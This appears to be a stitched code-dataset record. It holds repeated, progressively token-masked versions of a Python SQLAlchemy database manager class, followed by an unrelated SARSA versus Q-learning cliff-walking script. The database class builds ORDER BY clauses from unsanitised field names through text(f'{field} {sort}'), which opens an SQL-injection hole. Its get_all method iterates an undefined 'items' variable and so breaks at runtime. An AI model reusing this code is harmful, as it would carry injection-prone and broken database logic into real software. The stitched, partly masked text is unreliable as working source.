查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n <function token>\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if 
hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n <function token>\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = 
query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n <function token>\n <function token>\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: 
int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n <function token>\n <function token>\n <function token>\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n <function token>\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n <function token>\n <function token>\n <function token>\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = 
len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n<class token>\n" ]
false
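To make the calling convention of BaseDBMgr concrete, here is a hypothetical usage sketch. The User model and the configured db session are assumptions, not part of this record; only the argument shapes (filters as a set of SQLAlchemy expressions, orders as (field, direction) pairs, field as a tuple of column names) are taken from the class above.

# Hypothetical usage of BaseDBMgr -- 'User' and its to_dict() come from the
# project's BaseMixin and are assumed here; only the call shapes are real.
# assuming: from .manager import BaseDBMgr; from ..models import User
mgr = BaseDBMgr()

new_id = mgr.add(User, {'name': 'alice', 'age': 30})  # returns the new primary key

page = mgr.get_page(
    User,
    filters={User.age >= 18},    # set of SQLAlchemy filter expressions
    orders=[('id', 'desc')],     # (field, direction) pairs
    field=('id', 'name'),        # columns to include in each returned dict
    page=1,
    per_page=10,
)
print(page['page']['total_page'], len(page['items']))

affected = mgr.update(User, {'age': 31}, filters={User.name == 'alice'})
deleted = mgr.delete(User, filters={User.id == new_id})
total = mgr.count(User, filters={User.age >= 18})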
40
cb2e800cc2802031847b170a462778e5c0b3c6f9
import sys
from random import random, randint

import numpy as np
import matplotlib.pyplot as plt
from colorama import Back, Style
from gridworld import q_to_arrow


N_ROWS = 6
N_COLUMNS = 10

class State(object):
    def __init__(self, i, j, is_cliff=False, is_goal=False):
        self.i = i
        self.j = j
        self.is_cliff = is_cliff
        self.is_goal = is_goal
        # north, east, south, west
        self.q_values = np.array([0.0, 0.0, 0.0, 0.0])

    def __str__(self):
        return '({}, {})'.format(self.i, self.j)

    def is_terminal(self):
        return self.is_goal or self.is_cliff

    def get_max_q_index(self):
        # break ties between equally good actions at random
        best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
        if len(best_q_values) > 1:
            return best_q_values[randint(0, len(best_q_values) - 1)][0]
        else:
            return np.argmax(self.q_values)

    def get_max_q_value(self):
        return np.max(self.q_values)


def initialize_states():
    # This is the set of states, all initialised with default values
    states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]

    # make the cliff along the bottom row, between start and goal
    for j in range(1, N_COLUMNS - 1):
        states[-1][j].is_cliff = True

    states[-1][-1].is_goal = True
    return states


# The reward function defines what reward I get for transitioning between the first and second state
def reward(s_1, s_2):
    if s_1.is_goal or s_1.is_cliff:
        return 0
    elif s_2.is_goal:
        return 10
    elif s_2.is_cliff:
        return -100
    else:
        return -1

""" the transition function takes a state and an action and results in a new state,
depending on their attributes. The method takes the whole state-space as an argument
(since the transition depends on the attributes of the states in the state-space),
which could for example be the "states" matrix from above, the current state s from
the state-space (with its attributes), and the current action, which takes the form
of a "difference vector". For example, di = 1, dj = 0 means: move to the south;
di = 0, dj = -1 means: move to the west."""
def transition(stsp, s, di, dj):
    if s.is_cliff or s.is_goal:
        return s
    elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
        return s
    else:
        return stsp[s.i + di][s.j + dj]

gamma = 1
learning_rate = 0.01

def action_to_diff_vector(action):
    if action == 0:    # NORTH
        return -1, 0
    elif action == 1:  # EAST
        return 0, 1
    elif action == 2:  # SOUTH
        return 1, 0
    elif action == 3:  # WEST
        return 0, -1

def action_to_verbose(action):
    if action == 0:
        return 'NORTH'
    elif action == 1:
        return 'EAST'
    elif action == 2:
        return 'SOUTH'
    elif action == 3:
        return 'WEST'


def sarsa(state, next_state, action, next_state_action):
    # on-policy target: bootstrap from the action that will actually be taken
    r = reward(state, next_state)
    return r, state.q_values[action] +\
        learning_rate * (r + gamma * next_state.q_values[next_state_action] - state.q_values[action])


def q_learning(state, next_state, action, next_state_action):
    # off-policy target: bootstrap from the greedy action, whatever is taken next
    r = reward(state, next_state)
    next_state_q_value = next_state.get_max_q_value()
    return r, state.q_values[action] +\
        learning_rate * (r + gamma * next_state_q_value - state.q_values[action])

N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]

def run_code(use_q_learning=False, _epsilon=0.01):
    states = initialize_states()
    decay = 1
    min_epsilon = 0.00001
    epsilon = _epsilon

    episode_rewards = []
    mistakes_array = []  # tracks error from convergence on each episode
    for i in range(N_STEPS):
        # every episode starts in the bottom-left corner
        current_state = states[N_ROWS-1][0]

        # iterate until reaching a terminal state
        epsilon = max(min_epsilon, epsilon * decay)
        episode_reward = 0
        while not current_state.is_terminal():
            # epsilon-greedy action selection
            if random() < epsilon:
                next_action = randint(0, 3)
            else:
                next_action = current_state.get_max_q_index()

            di, dj = action_to_diff_vector(next_action)
            next_state = transition(states, current_state, di, dj)

            if random() < epsilon:
                next_state_action = randint(0, 3)
            else:
                next_state_action = next_state.get_max_q_index()

            # step_reward: don't shadow the module-level reward() function
            if use_q_learning:
                step_reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)
            else:
                step_reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)

            episode_reward += step_reward
            current_state = next_state
        if len(episode_rewards):
            episode_rewards.append(episode_rewards[-1] + episode_reward)
        else:
            episode_rewards.append(episode_reward)

        mistakes_array.append(check_accuracy(states))

    return np.array(mistakes_array), states, episode_rewards

def check_accuracy(states):
    # optimal state values for this gridworld, used as the convergence target
    correct_result = np.array([
        [-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],
        [-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],
        [-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],
        [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],
        [1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],
        [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],
    ])
    mistakes_delta = 0
    for i in range(N_ROWS):
        for j in range(N_COLUMNS):
            mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))

    return mistakes_delta

def plot_errors(mistakes_sarsa, mistakes_q_learning):
    plt.gca().invert_yaxis()
    legend = []
    for mistake_sarsa in mistakes_sarsa:
        plt.plot(mistake_sarsa[1])
        legend.append(r'SARSA $\epsilon={}$'.format(mistake_sarsa[0]))
    for mistake_q_learning in mistakes_q_learning:
        plt.plot(mistake_q_learning[1])
        legend.append(r'Q-learning $\epsilon={}$'.format(mistake_q_learning[0]))

    plt.grid(axis='y')  # was plt.grid(which='y'); 'y' is not a valid `which` value
    plt.legend(legend)

    plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))

def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
    final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])
    # first three plots go in the left column, the rest in the right one
    if PLOTS > 2:
        ax = ax[PLOTS % 3, 1]
    else:
        ax = ax[PLOTS, 0]
    ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
    ax.set_xticks(np.arange(N_COLUMNS))
    ax.set_yticks(np.arange(N_ROWS))
    ax.set_xticklabels([i for i in range(N_COLUMNS)])
    ax.set_yticklabels([i for i in range(N_ROWS)])
    plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
             rotation_mode="anchor")

    # Loop over data dimensions and create text annotations.
    for i in range(N_ROWS):
        for j in range(N_COLUMNS):
            ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),
                    ha="center", va="center", color="w")

    fig.tight_layout()
    ax.set_title(r'{}; $\epsilon={}$'.format(method, epsilon))

def display_optimal_policy(states, method, epsilon):
    print("{}; ε = {}".format(method, epsilon))
    print('-' * 60)
    for i in range(len(states)):
        for j in range(len(states[0])):
            if j == 0:
                print('|', end='')
            if states[i][j].is_goal:
                print(Back.GREEN + ' ', end='')
                print(Style.RESET_ALL + ' | ', end='')
            elif states[i][j].is_cliff:
                print(Back.RED + ' ', end='')
                print(Style.RESET_ALL + ' | ', end='')
            else:
                print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')
        print()
    print('-' * 60)

if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
    print('invalid method: must be Q_LEARNING, SARSA or BOTH')
    sys.exit()

mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
    if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
        _mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)
        plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)
        display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
        mistakes_q_learning.append((epsilon, _mistakes_q_learning))
        rewards.append(('Q_LEARNING', epsilon, episode_rewards))
        PLOTS += 1

for epsilon in EPSILONS:
    if METHOD == 'SARSA' or METHOD == 'BOTH':
        _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)
        plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)
        display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
        mistakes_sarsa.append((epsilon, _mistakes_sarsa))
        rewards.append(('SARSA', epsilon, episode_rewards))
        PLOTS += 1


plt.savefig('all_runs.png')
plt.show()
for method_name, eps, curve in rewards:
    plt.plot(curve, label='{} ε = {}'.format(method_name, eps))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.savefig('episode_rewards.png')  # save before show(), otherwise the file is blank
plt.show()

plot_errors(mistakes_sarsa, mistakes_q_learning)
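As a quick illustration of the one-line difference between the two learners above: sarsa bootstraps from the Q-value of the action actually chosen in the next state, while q_learning bootstraps from the greedy Q-value. The snippet below shows the two updates diverging on the same transition; the Q-values are fabricated for illustration, and it assumes the State, sarsa and q_learning definitions above are in scope.

# Illustration only: fabricated Q-values, same update rules as above.
s = State(4, 0)                    # a non-terminal state
s2 = State(3, 0)                   # its northern neighbour
s.q_values = np.array([0.5, 0.0, 0.0, 0.0])
s2.q_values = np.array([2.0, -1.0, 0.0, 0.0])

# Exploratory next action (WEST, index 3): SARSA uses q(s2, WEST) = 0.0 ...
_, q_sarsa = sarsa(s, s2, action=0, next_state_action=3)
# ... while Q-learning ignores it and uses max_a q(s2, a) = 2.0.
_, q_qlearn = q_learning(s, s2, action=0, next_state_action=3)

# reward(s, s2) = -1, so with learning_rate = 0.01 and gamma = 1:
# SARSA:      0.5 + 0.01 * (-1 + 0.0 - 0.5) = 0.485
# Q-learning: 0.5 + 0.01 * (-1 + 2.0 - 0.5) = 0.505
print(q_sarsa, q_qlearn)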
[ "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\n\n\nN_ROWS = 6\nN_COLUMNS = 10\n\nclass State(object):\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n # north, east, south, west\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n # This is the set of states, all initialised with default values\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n\n # make the cliff\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n\n states[-1][-1].is_goal = True\n return states\n\n\n# The reward function defines what reward I get for transitioning between the first and second state\ndef reward(s_1, s_2):\n if (s_1.is_goal or s_1.is_cliff):\n return 0\n elif (s_2.is_goal):\n return 10\n elif (s_2.is_cliff):\n return -100\n else:\n return -1\n\n\"\"\" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the \"states\" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a \"difference vector. For example, dx = 0, dy = 1 means: Move to the south. 
dx = -1, dy = 0 means: Move to the left\"\"\"\ndef transition(stsp, s, di, dj):\n if (s.is_cliff or s.is_goal):\n return s\n elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\ngamma = 1\nlearning_rate = 0.01\n\ndef action_to_diff_vector(action):\n if action == 0: # NORTH\n return -1, 0\n elif action == 1: # EAST\n return 0, 1\n elif action == 2: # SOUTH\n return 1, 0\n elif action == 3: # WEST\n return 0, -1\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 0.00001\n epsilon = _epsilon\n\n episode_rewards = []\n mistakes_array = [] # array which tracks error from convergence on each step\n for i in range(N_STEPS):\n # select a random starting state\n current_state = states[N_ROWS-1][0]\n\n # iterate until reaching a terminal state\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)\n\n # print(current_state, next_state, action_to_verbose(next_action), di, dj)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n\n '''\n if (i % 100 == 0):\n print(i)\n '''\n mistakes_array.append(check_accuracy(states))\n\n return np.array(mistakes_array), states, episode_rewards\n\ndef check_accuracy(states):\n correct_result = np.array([\n [-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],\n [-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],\n [-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],\n [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],\n [1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],\n ])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))\n\n return mistakes_delta\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append(r'SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))\n for 
mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append(r'Q-learning $\\epsilon={}$'.format(mistake_q_learning[0]))\n\n plt.grid(which='y')\n plt.legend(legend)\n\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n # plt.show()\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n # fig, ax = plt.subplots()\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),\n ha=\"center\", va=\"center\", color=\"w\")\n\n fig.tight_layout()\n ax.set_title(\"{}; $\\epsilon={}$\".format(method, epsilon))\n for i in range(N_ROWS):\n str_ = \"\"\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + \", \"\n PLOTS += 1\n # plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))\n # plt.show()\n\ndef display_optimal_policy(states, method, epsilon):\n\n print(\"{}; ε = {}\".format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. 
